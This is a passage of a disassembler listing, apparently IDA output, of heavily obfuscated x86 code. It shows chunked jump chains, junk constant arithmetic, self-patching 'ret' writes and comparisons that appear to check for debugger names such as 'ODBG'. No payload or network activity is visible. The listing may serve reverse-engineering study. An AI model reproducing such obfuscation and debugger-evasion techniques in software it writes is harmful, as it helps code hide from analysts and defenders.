		and	edi, ds:4000F9h
		or	edi, 79A38DA0h
		xor	edi, 0D37DDC16h
		add	edi, ebp
		add	edi, 5729BE48h
		mov	[edi], eax
; END OF FUNCTION CHUNK	FOR sub_458D28
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_439F91:				; CODE XREF: sub_43CD0B:loc_4424B0j
		jmp	loc_44F2CC
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------

loc_439F96:				; DATA XREF: sub_44BCAE+6o
		mov	eax, ds:dword_43C544
		or	eax, eax
		jnz	loc_4407BA
		jmp	loc_453FC5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_439FA9:				; CODE XREF: sub_43D285:loc_44449Ej
		mov	eax, offset dword_45109C
		call	sub_456DE7
		lea	eax, [ebp+var_14]
		push	eax

loc_439FB7:				; CODE XREF: sub_456423:loc_43E6DBj
		call	sub_43A87E
		jmp	loc_43CE0D
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_439FC1:				; CODE XREF: sub_442FD1:loc_43901Cj
		jg	loc_452FD0
		xchg	ebx, [eax]
		pushf
		or	eax, esi
		adc	ebp, 0F695CC07h
		jmp	loc_442B0D
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_439FD7:				; CODE XREF: sub_44D2F8-B99Cj
					; sub_44D2F8:loc_453B69j
		lea	eax, [ebp-2AAh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_43BCB4
		jmp	loc_44614A
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================



sub_439FEE	proc near		; DATA XREF: sub_458095:loc_43C79Eo

; FUNCTION CHUNK AT 00439E0A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A7DA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043DCA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E208 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440333 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443C2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445237 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447A87 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044956C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DBE7 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044ECDC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452A4D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004591DE SIZE 00000006 BYTES

		add	eax, 991153CEh
		add	eax, ebp
		add	eax, 0F0C72498h
		mov	eax, [eax]
		jmp	loc_44ECDC
sub_439FEE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43A003:				; CODE XREF: hvvrg7ie:00444D36j
		jb	loc_44213A
; START	OF FUNCTION CHUNK FOR sub_448181

loc_43A009:				; CODE XREF: sub_448181+9FEAj
		add	eax, 179ED9F6h
		xchg	eax, [esp+0]
		jmp	sub_458D36
; END OF FUNCTION CHUNK	FOR sub_448181
; ---------------------------------------------------------------------------
		ror	ecx, 0Bh
		jmp	sub_44C33E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43A01F:				; CODE XREF: sub_43D285:loc_43A2FEj
		jnz	loc_45B55D
		jmp	loc_444E44
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		xchg	ebp, [esp]
		push	ebp
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43A02F:				; CODE XREF: sub_440C05:loc_441631j
		call	sub_441A70
		mov	eax, 0E5254649h
		push	ecx
		push	0A7E8D1FCh
		pop	ecx

loc_43A040:				; CODE XREF: hvvrg7ie:0043AC1Aj
		add	ecx, 7172AD78h
		jmp	loc_446AFB
; END OF FUNCTION CHUNK	FOR sub_440C05

; =============== S U B	R O U T	I N E =======================================



sub_43A04B	proc near		; DATA XREF: sub_459E78-18D4Co

; FUNCTION CHUNK AT 00459171 SIZE 00000005 BYTES

		push	0ACDA66CAh
		pop	edi
		rol	edi, 1
		add	edi, 2EEC3B97h
		and	edi, 0D2A06668h
		add	edi, 7FA57FB4h
		xchg	edi, [esp+0]
		jmp	loc_459171
sub_43A04B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B5

loc_43A06D:				; CODE XREF: sub_44A1B5+10135j
		mov	edx, 811BFB99h

loc_43A072:				; CODE XREF: sub_44A1B5:loc_45A2E3j
		add	esi, 0B4033C5Ch
		xchg	esi, [esp+0]
		jmp	loc_458920
; END OF FUNCTION CHUNK	FOR sub_44A1B5
; ---------------------------------------------------------------------------
		xchg	eax, [esp]

loc_43A083:				; CODE XREF: hvvrg7ie:loc_44A8BDj
		jmp	loc_4438B5

; =============== S U B	R O U T	I N E =======================================



sub_43A088	proc near		; CODE XREF: sub_456F9F:loc_43B768p
					; hvvrg7ie:0044BC97j

; FUNCTION CHUNK AT 0044ADE6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D24C SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	edi, 0F3C8D831h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_10
		jmp	loc_44ADE6
sub_43A088	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_43A0A1:				; CODE XREF: hvvrg7ie:004542E0j
		jmp	sub_450C5A
; ---------------------------------------------------------------------------

loc_43A0A6:				; CODE XREF: hvvrg7ie:00441803j
		jmp	loc_43CF94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446356

loc_43A0AB:				; CODE XREF: sub_446356+9j
		push	edx
		mov	edx, ebp
		xchg	edx, [esp+4+var_4]
		jmp	loc_448E8D
; END OF FUNCTION CHUNK	FOR sub_446356

; =============== S U B	R O U T	I N E =======================================



sub_43A0B6	proc near		; DATA XREF: hvvrg7ie:0043B9AAo
		mov	byte ptr [eax],	0C3h
sub_43A0B6	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44E533

loc_43A0B9:				; CODE XREF: sub_44E533:loc_4486FCj
		jmp	loc_45916C
; END OF FUNCTION CHUNK	FOR sub_44E533

; =============== S U B	R O U T	I N E =======================================



sub_43A0BE	proc near		; CODE XREF: sub_40A15D+17Fp
					; sub_40A15D+2A3p ...
		call	sub_43A0C9
		jmp	ds:off_41D078
sub_43A0BE	endp


; =============== S U B	R O U T	I N E =======================================



sub_43A0C9	proc near		; CODE XREF: sub_43A0BEp
					; sub_43DE01:loc_4451ACj ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004458D0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004549E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455A75 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004593E6 SIZE 00000010 BYTES

		xchg	eax, [esp+0]
		push	eax
		pop	edx
		jmp	loc_4549E5
sub_43A0C9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44801A

loc_43A0D3:				; CODE XREF: sub_44801A+2j
		pop	eax
		xchg	eax, [esp-4+arg_0]
; END OF FUNCTION CHUNK	FOR sub_44801A
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_43A0D7:				; CODE XREF: sub_43EE33+Fj
		mov	ebp, esp
		jno	sub_45A4C9
		add	esp, 0FFFFFFD0h
		mov	eax, 12h
		jmp	loc_445D83
; END OF FUNCTION CHUNK	FOR sub_43EE33

; =============== S U B	R O U T	I N E =======================================



sub_43A0EC	proc near		; CODE XREF: hvvrg7ie:00446868j
					; sub_439873:loc_4532EEp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043A8CA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043EA2F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004403CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004432CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044679F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004472C7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447CE9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004482E5 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004509BD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00457183 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	[ebp-8], eax

loc_43A0F3:				; CODE XREF: sub_456F9F:loc_456FADj
					; sub_456F9F+1222j
		jo	loc_4472C7
		jmp	loc_4403CF
sub_43A0EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_43A0FE:				; CODE XREF: sub_4569C6-10484j
					; sub_4569C6:loc_44E78Cj
		push	3314D5FFh
		pop	eax
		xor	eax, 0DB864DC7h
		add	eax, 0C94BAAB7h
		add	eax, ebp
		add	eax, 4E21BD0Dh
		jmp	loc_44D628
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44290B

loc_43A11D:				; CODE XREF: sub_44290B+10j
		mov	eax, [eax+24h]
		call	sub_44CDE7

loc_43A125:				; CODE XREF: hvvrg7ie:loc_43E5FCj
		jz	loc_443796
; END OF FUNCTION CHUNK	FOR sub_44290B
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43A12B:				; CODE XREF: sub_43C811+E872j
		jmp	loc_44790F
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
		pop	eax
		jmp	loc_43DDB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D4D2

loc_43A136:				; CODE XREF: sub_43D4D2:loc_43B88Cj
		mov	[ecx], eax
		push	offset sub_443695
		jmp	nullsub_103
; END OF FUNCTION CHUNK	FOR sub_43D4D2

; =============== S U B	R O U T	I N E =======================================



sub_43A142	proc near		; DATA XREF: sub_4527A1-93F2o

; FUNCTION CHUNK AT 00447D9E SIZE 00000005 BYTES

		push	74920226h
		pop	edx
		sub	edx, 58F8EB55h
		add	edx, 0E4AA8A8Bh
		xchg	edx, [esp+0]
		jmp	loc_447D9E
sub_43A142	endp

; ---------------------------------------------------------------------------
		mov	edx, 87C4571Ah
		call	sub_446A16
		call	sub_439A6C
; START	OF FUNCTION CHUNK FOR sub_4450D8

loc_43A16B:				; CODE XREF: sub_4450D8+12j
		jmp	loc_44825E
; END OF FUNCTION CHUNK	FOR sub_4450D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_43A170:				; CODE XREF: sub_4414F6-3AFj
		jmp	loc_457AAF
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------

loc_43A175:				; CODE XREF: hvvrg7ie:0043CF46j
		jmp	loc_44630C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B36F

loc_43A17A:				; CODE XREF: sub_43B36F:loc_44C97Fj
		popf
		xchg	edi, [esp+4+var_4]
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_43B36F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44290B

loc_43A183:				; CODE XREF: sub_44290B:loc_4577E1j
		add	edi, 6AC1A1B3h
		sub	edi, 24E38045h
		add	edi, 0EE4D658Ah
		mov	[edi], eax
		jmp	loc_4526ED
; END OF FUNCTION CHUNK	FOR sub_44290B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_43A19C:				; CODE XREF: sub_44957E:loc_45811Fj
		mov	byte ptr [edx],	0E9h
		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		sub	ecx, 5BF82E29h
		add	ecx, 9947C169h
		jmp	loc_43E408
; END OF FUNCTION CHUNK	FOR sub_44957E
; ---------------------------------------------------------------------------

loc_43A1B6:				; CODE XREF: hvvrg7ie:00457361j
		lea	eax, nullsub_12
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_12

; =============== S U B	R O U T	I N E =======================================



sub_43A1C4	proc near		; DATA XREF: .data:off_427448o
		call	nullsub_29
		jmp	ds:dword_41D180
sub_43A1C4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_43A1CF:				; CODE XREF: sub_45202B-9A5Fj
		jmp	nullsub_152
; END OF FUNCTION CHUNK	FOR sub_45202B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	[eax], ecx
		daa
		add	[eax], eax
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		jmp	loc_43DE74
; ---------------------------------------------------------------------------

loc_43A1E5:				; CODE XREF: hvvrg7ie:00442CC3j
		jmp	ds:dword_41D148
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_535. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	[edx], ah
		add	[eax], eax
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp]
		jmp	loc_451EB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_43A1FF:				; CODE XREF: sub_43D531-16EAj
		and	ebp, 458C0191h
		sbb	edx, 23A633FAh
		add	esi, eax
		test	edi, 2625B4D7h
		jmp	loc_442AB8
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_43A218:				; CODE XREF: sub_443375:loc_44B3BFj
					; sub_443375+15F39j
		cmp	dword ptr [ebp-108h], 6C436E6Fh
		jnz	loc_44DCB3
		jmp	loc_44BDB8
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_43A22D:				; CODE XREF: sub_44BEBB+6j
		call	sub_456335
		test	al, al
		jz	loc_446061
		jmp	loc_45417D
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43A23F:				; CODE XREF: sub_446D8D+3EDBj
		or	eax, 3798A17Ah
		add	eax, 0C086B93Dh
		xchg	eax, [esp+0]
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_43A253:				; CODE XREF: sub_43D964+17j
		jz	loc_440AA6
		add	ebp, ecx
		push	799F3153h
		jmp	loc_440AA4
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_43A265:				; CODE XREF: sub_43E100:loc_439852j
					; sub_443452+B442j
		xor	edx, 0DC6CF588h
		call	sub_446A16
		push	edi
		mov	edi, eax

loc_43A273:				; CODE XREF: hvvrg7ie:004398AAj
		xchg	edi, [esp+8+var_8]
		ror	eax, 0Eh
		push	offset sub_455DA8
		jmp	nullsub_426
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_43A283:				; CODE XREF: sub_44957E:loc_43C17Cj
		mov	edx, offset sub_451E4E
		jmp	loc_45811F
; END OF FUNCTION CHUNK	FOR sub_44957E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4522F8

loc_43A28D:				; CODE XREF: sub_4522F8+13j
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jz	loc_44AEBA
		mov	edx, [ebx+ecx]
		xor	edx, [ebx+ecx+4]
		jmp	loc_45156B
; END OF FUNCTION CHUNK	FOR sub_4522F8

; =============== S U B	R O U T	I N E =======================================



sub_43A2A5	proc near		; DATA XREF: hvvrg7ie:00446E82o

; FUNCTION CHUNK AT 0043F53C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443933 SIZE 00000013 BYTES

		call	sub_450C5A
		push	esi
		push	0DEA7F440h
		pop	esi
		jmp	loc_443933
sub_43A2A5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465E5

loc_43A2B6:				; CODE XREF: sub_4465E5:loc_448860j
		jg	sub_447793
		jmp	loc_44A8E2
; END OF FUNCTION CHUNK	FOR sub_4465E5
; ---------------------------------------------------------------------------

loc_43A2C1:				; CODE XREF: hvvrg7ie:loc_441BF5j
		mov	edx, esi
		pop	esi
		rol	edx, 1Dh
		add	edx, 7C7D81FBh
		and	edx, 9B6B93EBh
		add	edx, 0F5FBF67Fh
		push	offset sub_444DBA

loc_43A2DE:				; CODE XREF: hvvrg7ie:0044A3F9j
		jmp	locret_43C171
; ---------------------------------------------------------------------------

loc_43A2E3:				; CODE XREF: hvvrg7ie:00455482j
		rol	eax, 12h
		add	eax, 0C38C18h
		call	sub_44BF66
		mov	[ebp-8], eax
		call	sub_43E338
; START	OF FUNCTION CHUNK FOR sub_4508AD

loc_43A2F9:				; CODE XREF: sub_4508AD+4j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_4508AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43A2FE:				; CODE XREF: sub_43D285+7699j
		jmp	loc_43A01F
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEC3

loc_43A303:				; CODE XREF: sub_43DEC3+57A6j
		jmp	loc_43EDBD
; END OF FUNCTION CHUNK	FOR sub_43DEC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_241. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_424. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_43A30A:				; CODE XREF: sub_444B29+976Bj
		jmp	loc_453C8A
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_43A30F:				; CODE XREF: sub_445F2A+9BBj
		jmp	loc_43E2D8
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44271E

loc_43A314:				; CODE XREF: sub_44271E:loc_4457D9j
		jmp	loc_454569
; END OF FUNCTION CHUNK	FOR sub_44271E

; =============== S U B	R O U T	I N E =======================================



sub_43A319	proc near		; CODE XREF: sub_444DBA+8j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439BCD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456040 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004562F9 SIZE 00000006 BYTES

		push	ebx
		pushf
		push	0CB47C5EFh
		pop	ebx

loc_43A321:				; CODE XREF: hvvrg7ie:0044E7C1j
		and	ebx, 0AA1D5483h
		jmp	loc_4562F9
sub_43A319	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44121E

loc_43A32C:				; CODE XREF: sub_44121E:loc_44047Fj
		or	eax, 113B6E98h
		add	eax, 0C0463AF4h
		xchg	eax, [esp+8+var_8]
		jmp	sub_449EB1
; END OF FUNCTION CHUNK	FOR sub_44121E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43A340:				; CODE XREF: sub_44D2F8:loc_44DC2Bj
		sbb	ebx, 0C8CE8F3Dh
		jmp	loc_454869
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43A34B:				; CODE XREF: sub_43F227+14229j
		add	eax, ebp
		add	eax, 0AE483EABh
		cmp	dword ptr [eax], 47424454h
		jz	loc_43BCB4
		jmp	loc_457503
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_43A364:				; CODE XREF: sub_44048E:loc_4518A4j
		jz	sub_43AF52
		jmp	loc_44D562
; END OF FUNCTION CHUNK	FOR sub_44048E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_43A36F:				; CODE XREF: sub_44346F-5317j
		cmp	esi, 524FD9D8h
		jmp	loc_44A09B
; END OF FUNCTION CHUNK	FOR sub_44346F
; ---------------------------------------------------------------------------

loc_43A37A:				; DATA XREF: sub_44F879+6o
		jz	loc_45A807
; START	OF FUNCTION CHUNK FOR sub_45AA38

loc_43A380:				; CODE XREF: sub_45AA38-15C26j
		push	offset sub_43C00F
		jmp	loc_44C7AF
; END OF FUNCTION CHUNK	FOR sub_45AA38
; ---------------------------------------------------------------------------

locret_43A38A:				; CODE XREF: hvvrg7ie:0044D697j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43A38B:				; CODE XREF: sub_43C811+1CFADj
		jz	loc_4503D5
		jmp	loc_44C866
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------

loc_43A396:				; CODE XREF: hvvrg7ie:loc_4402ACj
					; hvvrg7ie:0045314Dj
		mov	eax, [ebp-4]
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		cmp	eax, 0C3C033h
		jnz	loc_441C81
		jmp	loc_44AFFE
; ---------------------------------------------------------------------------
		mov	[ebp-4], eax

loc_43A3B3:				; CODE XREF: hvvrg7ie:0043B228j
		cmp	dword ptr [ebp-4], 0
		jz	loc_45281D
		jmp	loc_449982

; =============== S U B	R O U T	I N E =======================================



sub_43A3C2	proc near		; CODE XREF: sub_4414F6+165BFp
					; hvvrg7ie:0045AD4Dj
		xchg	esi, [esp+0]
		pop	esi
		call	sub_450C5A
		push	offset loc_44CB31
		jmp	nullsub_30
sub_43A3C2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_43A3D5	proc near		; DATA XREF: hvvrg7ie:0043AA5Co

; FUNCTION CHUNK AT 0043B777 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FFDF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C66F SIZE 00000005 BYTES

		push	0E524D8A0h
		pop	eax
		rol	eax, 3
		and	eax, 0A419EB74h

loc_43A3E4:				; CODE XREF: hvvrg7ie:0043C4F6j
		xor	eax, 656CA733h
		jmp	loc_43B777
sub_43A3D5	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_375. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448ECC

loc_43A3F0:				; CODE XREF: sub_448ECC-30B3j
		jmp	loc_43FDDD
; END OF FUNCTION CHUNK	FOR sub_448ECC
; ---------------------------------------------------------------------------

loc_43A3F5:				; CODE XREF: hvvrg7ie:0043A9F2j
		jmp	loc_43C906
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E532

loc_43A3FA:				; CODE XREF: sub_43E532-3B5Aj
		jmp	nullsub_493
; END OF FUNCTION CHUNK	FOR sub_43E532
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_43A3FF:				; CODE XREF: sub_4447AC:loc_447E7Bj
		jz	loc_44F6BE
; END OF FUNCTION CHUNK	FOR sub_4447AC
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_43A405:				; CODE XREF: sub_43AB99+1AB08j
		jmp	loc_458C60
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
		not	ecx
		xor	ebp, esi
		xchg	edx, ebx
		jmp	loc_44F6BE
; ---------------------------------------------------------------------------

loc_43A415:				; CODE XREF: hvvrg7ie:loc_45908Cj
		pop	eax
		add	eax, 433D14BDh
		rol	eax, 19h
		add	eax, 0CFE32D7Bh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_444F04
		jmp	loc_455E08
; ---------------------------------------------------------------------------
		xchg	ecx, edi
		jmp	sub_450434
; ---------------------------------------------------------------------------
		mov	[esi], ecx
		jmp	sub_43BDCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_43A442:				; CODE XREF: sub_4495B9:loc_4424D9j
		jz	loc_440F92

loc_43A448:				; CODE XREF: sub_443452:loc_44E88Cj
		jmp	loc_44E12B
; END OF FUNCTION CHUNK	FOR sub_4495B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44772D

loc_43A44D:				; CODE XREF: sub_44772D+12j
		add	ebx, 0C597EBD3h

loc_43A453:				; CODE XREF: hvvrg7ie:0044EAC3j
		and	ebx, 752A375Ah
		add	ebx, 0FB01FEA4h
		xor	ebx, 0D686D8A5h
		jmp	loc_457202
; END OF FUNCTION CHUNK	FOR sub_44772D
; ---------------------------------------------------------------------------

loc_43A46A:				; CODE XREF: hvvrg7ie:0044C051j
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44698D
		jmp	loc_455932
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D5

loc_43A47A:				; CODE XREF: sub_44B2D5:loc_441C40j
					; hvvrg7ie:00441C53j
		add	edi, 5AAB645Dh
		mov	[edi], eax
		pop	edi
		lea	eax, sub_43F521
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A143
; END OF FUNCTION CHUNK	FOR sub_44B2D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439990

loc_43A491:				; CODE XREF: sub_439990+4j
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	ebp
		jmp	loc_440C29
; END OF FUNCTION CHUNK	FOR sub_439990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439717

loc_43A49B:				; CODE XREF: sub_439717:loc_456C90j
		js	loc_441607
		adc	ebp, 685D701Ch
		sub	esi, 615582A7h
		and	esi, 0A5514954h
		cdq
		jmp	loc_44F75A
; END OF FUNCTION CHUNK	FOR sub_439717
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BC8

loc_43A4B9:				; CODE XREF: sub_451BC8:loc_4586FCj
		jge	loc_445134
; END OF FUNCTION CHUNK	FOR sub_451BC8
; START	OF FUNCTION CHUNK FOR sub_45278C

loc_43A4BF:				; CODE XREF: sub_45278C+8j
		jmp	loc_451628
; END OF FUNCTION CHUNK	FOR sub_45278C
; ---------------------------------------------------------------------------
		sbb	ecx, 2D82CC38h
		jmp	loc_443F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B1

loc_43A4CF:				; CODE XREF: sub_43B7B1:loc_449339j
		push	ecx
		mov	esp, ebp
		call	sub_442B3C
		mov	ds:dword_41D18C, eax
		lea	eax, nullsub_20
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_20
; END OF FUNCTION CHUNK	FOR sub_43B7B1
; ---------------------------------------------------------------------------
		call	sub_443CB8	; RtlSizeHeap
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_43A4F0:				; CODE XREF: sub_44107D-2A38j
		jmp	nullsub_454
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------

loc_43A4F5:				; CODE XREF: hvvrg7ie:0044342Fj
		call	sub_450C5A
		mov	ds:dword_41D18C, eax
		lea	eax, nullsub_20
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C633
; ---------------------------------------------------------------------------
		xchg	ecx, [esp]
		mov	edx, ecx
		xchg	ebx, [esp]
		jmp	loc_44830C
; ---------------------------------------------------------------------------

loc_43A51B:				; CODE XREF: hvvrg7ie:00446669j
		jge	loc_444336
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_43A521:				; CODE XREF: sub_4580B4:loc_446657j
		or	edi, 94478ACFh
		add	edi, 207D0259h
		mov	[edi], eax
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FC5

loc_43A531:				; CODE XREF: sub_446FC5+10B81j
		jmp	loc_455039
; END OF FUNCTION CHUNK	FOR sub_446FC5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_43A536:				; CODE XREF: sub_457A97+7j
		jmp	loc_451067
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43A53B:				; CODE XREF: sub_43D285:loc_4510A6j
		jnz	loc_4444EB
		jmp	loc_44CB11
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D809

loc_43A546:				; CODE XREF: sub_43D809+58CFj
		mov	eax, [esp+0]
		push	edx
		push	edi
		push	216C0EF9h
		pop	edi
		and	edi, 34096E44h
		xor	edi, ds:4000FBh
		jmp	loc_43E16D
; END OF FUNCTION CHUNK	FOR sub_43D809
; ---------------------------------------------------------------------------

loc_43A562:				; CODE XREF: hvvrg7ie:0043B301j
		xchg	ebx, [edi]

; =============== S U B	R O U T	I N E =======================================



sub_43A564	proc near		; CODE XREF: hvvrg7ie:loc_458A76p

; FUNCTION CHUNK AT 0044B729 SIZE 00000005 BYTES
